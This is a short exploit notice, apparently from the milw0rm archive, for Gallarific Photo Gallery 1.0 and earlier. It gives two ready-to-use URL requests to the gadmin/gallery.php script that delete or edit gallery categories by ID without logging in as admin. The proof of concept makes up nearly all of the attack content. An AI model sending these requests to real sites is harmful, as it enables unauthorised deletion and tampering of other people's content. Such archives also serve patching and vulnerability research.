# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability //Author: iLker Kandemir -- MEFISTO //Price : 47 $ //script demo : http://www.gallarific.com/demo/index.php //[imhatimi.org] ---------------------------------------------------------------- //exploit : 1) http://[site]/gadmin/gallery.php?task=delete&id=1 2) http://[site]/gadmin/gallery.php?task=edit&id=1 ---------------------------------------------------------------- //Note: /* You don't need access to admin-panel ;) */ side note: Original Advisory without poC : http://secunia.com/advisories/29399 # milw0rm.com [2009-08-12]